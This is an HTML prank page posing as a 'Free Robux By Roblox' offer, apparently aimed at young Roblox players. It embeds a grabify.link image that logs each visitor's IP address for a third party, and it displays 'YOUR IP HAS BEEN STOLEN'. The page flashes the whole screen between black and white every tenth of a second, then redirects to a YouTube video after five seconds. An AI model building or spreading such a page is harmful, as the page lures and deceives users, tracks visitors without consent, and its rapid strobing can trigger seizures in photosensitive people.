<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Free Robux By Roblox</title><meta http-equiv="refresh" content="5; url=https://www.youtube.com/watch?v=xvFZjo5PgG0" />
</head>
<style>
  body {
    margin: 0;
    font-family: Arial, sans-serif;
    text-align: center;
    animation: flash 0.1s alternate infinite;
  }
  
  .text {
    font-size: 4em;
    animation: colorSwitch 0.1s alternate infinite;
  }
  
  .textsmall {
    font-size: 3em;
    animation: colorSwitch 0.1s alternate infinite;
  }

  @keyframes flash {
    from { background-color: black; color: white; }
    to { background-color: white; color: black; }
  }
  
  @keyframes colorSwitch {
    from { color: inherit; }
    to { color: inherit; }
  }
</style>
</head>
<body>
  <h1 class="text">THERE IS NO FREE ROBUX</h1>
  <h1 class="textsmall">YOUR IP HAS BEEN STOLEN</h1>
  <img src="https://grabify.link/4TP221"></img>
</body>
</html>
